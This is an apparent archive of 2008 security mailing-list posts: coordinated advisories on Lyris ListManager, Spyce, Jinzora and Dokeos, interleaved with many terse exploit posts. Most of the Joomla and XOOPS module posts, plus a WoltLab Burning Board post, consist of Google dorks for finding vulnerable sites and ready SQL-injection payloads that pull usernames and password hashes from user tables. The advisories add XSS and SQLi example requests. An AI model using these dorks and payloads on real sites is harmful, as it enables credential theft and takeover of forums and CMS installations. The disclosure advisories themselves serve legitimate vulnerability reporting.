This vulnerability could be considered a medium-high risk (rather than 
medium risk) in cases in which admin users are targeted, resulting in 
the attacker gaining administrative privileges on the target 
Plumtree/AquaLogic Portal.



Fix: this issue will be addressed in the 6.5 release of AquaLogic 
Interaction.



References:

"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php

BEA's BEA08-186.00 advisory:

"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not 
liable for any misuse  of this information by any third party.




WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

2008-02-19 Thread nbbn
##
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##


::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,
 
(SELECT password  FROM wcf1_user WHERE userID=1 AND 
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1))

An attacker should have to register at the board to use this. 

You can ask TRUE/FALSE questions to the database. Modify 300 if the stuff 
doesn't work. On some MySQL Versions you need to edit this query 



::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1))

1,1 is the position in the crypted password. 55 is the char in the 
ascii-table. 

In this example we ask for number 7 in the hash, position 1. If the page load 
fast, you find a true char. If not, ask other chars ;-).If you enter a char 
that is higher then the true's, the page load fast to, so start from 48 first 
and go higher. 



::Vulnerabiltiy
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so 
I don't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX 
WoltLab Burning Board 3.0.1 PLX 
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)...



Please don't use this to crack forums. All what you do with this is at your 
own risk. 









SYMSA-2008-001: Lyris ListManager - Multiple Vulnerabilities

2008-02-19 Thread research
-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1



Symantec Vulnerability Research   

http://www.symantec.com/research

Security Advisory

 

Advisory ID: SYMSA-2008-001

Advisory Title: Lyris ListManager - Multiple Vulnerabilities

Author: Tyler Shields [EMAIL PROTECTED]

Release Date: Wednesday, January 21, 2008

Application: Lyris List Manager

Platform: Web Interface

Severity: Remotely Exploitable

Vendor status: Vendor has corrected products and is ok with public release 

CVE Number: CVE-2007-6319

Reference: http://www.securityfocus.com/bid/26792

 

Overview: 

 

"Lyris ListManager is the world's most popular software for creating,

sending, and tracking highly effective email campaigns, newsletters,

and discussion groups. From our new Template and Content Builder to

our Image Library and new HTML editor, ListManager is the smarter,

faster, easier way to manage all the aspects of your email marketing

program."

 

Details: 

 

1. A user who is subscribed to any list on the ListManager system may

modify client side information sent to the server related to their 

account, effectively elevating their privileges to list administrator. 

 

2. A user who is subscribed to any list may gain access to arbitrary 

mailing lists by modifying client side information sent to the server. 

Accessing a preexisting mailing list on the ListManager system causes 

the active user to be added as a member or administrator to that list.

 

3. Once administrative access is granted, a vulnerability in the

ListManager administrative interface allows an attacker

to create new accounts that collide with existing accounts. This

collision will result in overwriting data in the original account 

with the data from the new account.

 

Vendor Response:

 

Vendor has acknowledged and corrected the issue in several versions 

of the product.  

 

Recommendation:


New versions of each major revision (8.95d, 9.2c and 9.3b), are available 

at http://www.lyris.com/support/listmanager/archives.html. Affected 

clients can download a new version and install it over the previous 

installation.

 


Common Vulnerabilities and Exposures (CVE) Information:

 

The Common Vulnerabilities and Exposures (CVE) project has assigned 

the following names to these issues.  These are candidates for 

inclusion in the CVE list (http://cve.mitre.org), which standardizes 

names for security problems.

 


 

- ---Symantec Vulnerability Research Advisory Information---

 

For questions about this advisory, or to report an error:

[EMAIL PROTECTED]

 

For details on Symantec's Vulnerability Reporting Policy: 

http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

 

Symantec Vulnerability Research Advisory Archive: 

http://www.symantec.com/research/  

 

Symantec Vulnerability Research GPG Key:

http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

 

- -Symantec Product Advisory Information-

 

To Report a Security Vulnerability in a Symantec Product:

[EMAIL PROTECTED] 

 

For general information on Symantec's Product Vulnerability 

reporting and response:

http://www.symantec.com/security/

 

Symantec Product Advisory Archive: 

http://www.symantec.com/avcenter/security/SymantecAdvisories.html

 

Symantec Product Advisory PGP Key:

http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

 

- ---

 

Copyright (c) 2007 by Symantec Corp.

Permission to redistribute this alert electronically is granted 

as long as it is not edited in any way unless authorized by 

Symantec Consulting Services. Reprinting the whole or part of 

this alert in any medium other than electronically requires 

permission from [EMAIL PROTECTED]

 

Disclaimer

The information in the advisory is believed to be accurate at the 

time of publishing based on currently available information. Use 

of the information constitutes acceptance for use in an AS IS 

condition. There are no warranties with regard to this information. 

Neither the author nor the publisher accepts any liability for any 

direct, indirect, or consequential loss or damage arising from use 

of, or reliance on, this information.

 

Symantec, Symantec products, and Symantec Consulting Services are 

registered trademarks of Symantec Corp. and/or affiliated companies 

in the United States and other countries. All other registered and 

unregistered trademarks represented in this document are the sole 

property of their respective companies/owners.

-BEGIN PGP SIGNATURE-

Version: GnuPG v1.4.6 (GNU/Linux)


iD8DBQFHub+Cuk7IIFI45IARApcpAJ9x6KT4x2dvUerMthMOf6GtSh6WfwCgzuBV

NXgp2vbVovME0XaN1Lt2/xA=

=mDUZ

-END PGP SIGNATURE-



joomla SQL Injection(com_genealogy)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_genealogy)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_genealogy"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_genealogy&task=profile&id=-999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

2008-02-19 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-016


Application:Jinzora Media Jukebox
Versions Affected:  2.7.5
Vendor URL: http://www.jinzora.com/
Bugs:   Multiple XSS Injections
Exploits:   YES
Reported:   04.02.2008
Second report:  12.02.2008
Vendor response:NONE
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS



Details
***

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL 
string.


1.1 Linked XSS vulnerabiliies found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=


1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=


1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=


1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/";>alert('DSecRG XSS')

-


2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter 
name "siteNewsData" 

Example:

siteNewsData = alert('DSecRG XSS')


2.1 Vulnerability found in script popup.php?ptype=playlistedit in post 
parameter name "query" 

Example:

query = alert('DSecRG XSS')





About
*

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)


-- 

  Digital Security Research Group  mailto:[EMAIL PROTECTED]



joomla SQL Injection(com_listoffreeads)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_listoffreeads)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_listoffreeads"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure on Spyce - Python Server Pages (PSP)

2008-02-19 Thread ProCheckUp Research
PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure 
on Spyce - Python Server Pages (PSP)


Vulnerability found: 19th December 2007

Vendor informed: 14th January 2007

Vulnerability fixed: the vendor did not respond, however a workaround 
has been included in the "Fix" section of this advisory.


Severity: Medium

Description:

All Spyce sample scripts that return client-supplied input back to the 
browser are vulnerable to XSS. It is also possible to redirect users to 
third-party sites and obtain the webroot path by not submitting required 
parameters to certain scripts.



Note: tested on Spyce - Python Server Pages version 2.1.3


The following are only some examples that demonstrate XSS:

http://domain.foo/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal
http://domain.foo/docs/examples/handlervalidate.spy?x=";>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/request.spy?name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/getpost.spy?Name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?="/>alert('Can%20Cross%20Site%20Attack')&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E


Other vulnerable scripts and unsanitized parameters:

Script: /demos/chat/
parameter: newline

Script: /docs/examples/formintro.spy
parameter: text1

Script: /docs/examples/formtag.spy
parameter: mytext
parameter: mydate

Script: /docs/examples/redirect.spy
parameter: type


Note: some XSS can only be exploited via POST requests (as opposed to 
GET). This could be done by using an embedded HTML form with 
"method='POST'" attribute and a JavaScript snippet that causes the form 
to auto-submits itself. Such form would be located on a third-party site.



Cross-domain redirect PoC:

http://domain.foo/spyce/examples/redirect.spy?url=www.procheckup.com&type=external


Requesting the following URL returns the server's webroot:

http://domain.foo/spyce/examples/automaton.spy


Consequences:

An attacker may be able to cause execution of malicious scripting code 
in the browser of a user who clicks on a link to a Spyce-based site. 
Such code would run within the security context of the target domain. 
This type of attack can result in non-persistent defacement of the 
target site, or the redirection of confidential information (i.e.: 
session IDs) to unauthorised third parties.


Attackers can redirect victim users to third-party sites. Such behaviour 
can help attackers perform phishing attacks by redirecting the victim to 
a spoof login page.



Fix:

Remove sample scripts from live environments.


References:

http://www.procheckup.com/Vulnerabilities.php
http://spyce.sourceforge.net/


Credits: Richard Brain, Jan Fry, and Bruno Kovacs of ProCheckUp Ltd 
(www.procheckup.com)



Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not 
liable for any misuse of this information by any third party.





joomla SQL Injection(com_facileforms)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_facileforms)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_facileforms"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module myTopics-print SQL Injection(articleid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module myTopics-print SQL Injection(articleid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: "/modules/myTopics/"

# 

#  you can add expliot after mytopics  

#



  example


  /modules/myTopics/ (exploit)   



EXPLOIT : 


print.php?articleid=-999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module wflinks SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module wflinks SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wflinks/viewcat.php

# 

#  DORK 2 : allinurl: modules/wflinks

#





  example


  http://xx.com/modules/wflinks/viewcat.php?cid= [exploit]


  EXPLOIT : 


-88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 









joomla SQL Injection(com_geoboerse)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_geoboerse)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_geoboerse"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_detail)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_detail)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_detail"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_detail&[EMAIL 
PROTECTED]&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A






# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_team

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_team)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_team"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*






# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





SmarterMail Enterprise 4.3 - malformed mail XSS

2008-02-19 Thread jplopezy


Product: SmarterMail Enterprise 4.3


Web product: 


http://www.smartertools.com/Products/SmarterMail/O

verview.aspx


web product demo:


http://maildemo.smartertools.com/Login.aspx



Apparently this webmail is vulnerable to an attack xss very dangerous because 
it runs automatically when you open the inbox. 

The vulnerability is to create a malformed mail, the procedure is to add a line 
of code on the subject and this causes the execution of xss in your inbox. 


Simply add the following line of code in the subject of the mail to execute the 
subject: 


The line of code is stored in the text file by precautions that just copy and 
paste it into the subject of the mail to test concept


http://es.geocities.com/jplopezy/SmarterMailXSS.txt



I hope that will be useful greetings!



Juan Pablo Lopez Yacubian

fuzzertina.blogspot.com






joomla SQL Injection(com_formtool)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_formtool)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_formtool"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_formtool&task=view&formid=2&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_iigcatalog)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_iigcatalog)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_iigcatalog"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module section SQL Injection(articleid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module section SQL Injection(articleid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wfsection/print.php?articleid=

# 



   EXPLOIT : 


-999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,97,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pass%20admin%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 








[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

2008-02-19 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-015


Application:Dokeos E-Learning System
Versions Affected:  1.8.4
Vendor URL: http://dokeos.com
Bugs:   Multiple SQL Injections,Multiple Blind SQL 
Injections,Multiple  XSS, etc.
Exploits:   YES
Reported:   25.01.2008
Vendor response:28.01.2008
Patch released: 12.02.2008
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Dokeos E-Learning System system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
***


1. Multiple SQL Injections

1.1  Attacker can inject SQL code in module /whoisonline.php vulnerable 
parametr id 
 Attacker must have valid user creditionals 
 

Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*


1.2  Attacker can inject SQL code in module main/mySpace/index.php vulnerable 
parameter tracking_list_coaches_column





Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';

1.3  Attacker can inject SQL code in module 
/dokeos/main/create_course/add_course.php POST Parameter tutor_name


Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='



-


2.  Multiple SQL Injections

2.1 Vulnerability found in script index.php in header parameter  "Referer"


Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.1 Vulnerability found in script /main/admin/class_list.php? in header 
parameter  "X-Fowarded-For"



-




3. Stored  XSS vulnerability found in /main/auth/inscription.php attacker can 
inject XSS in POST  parameter username 


-

4. Multiple linked XSS


4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php 
attacker can inject XSS in parameter courseCode 


Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=";>alert('DSecRG
 XSS')



4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker 
can inject XSS in parameter category

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=alert('DSecRG
 XSS') HTTP/1.0



4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php 
attacker can inject XSS in parameter cmessage 


Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27>

-


5. Image XSS vulnerability in page main/auth/profile.php   attacker can upload 
avatar picture with XSS code:


Example:

More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

-

Fix Information
***

Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded 
here:

http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download



About
*

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)





  Digital Security Research Groupmailto:[EMAIL PROTECTED]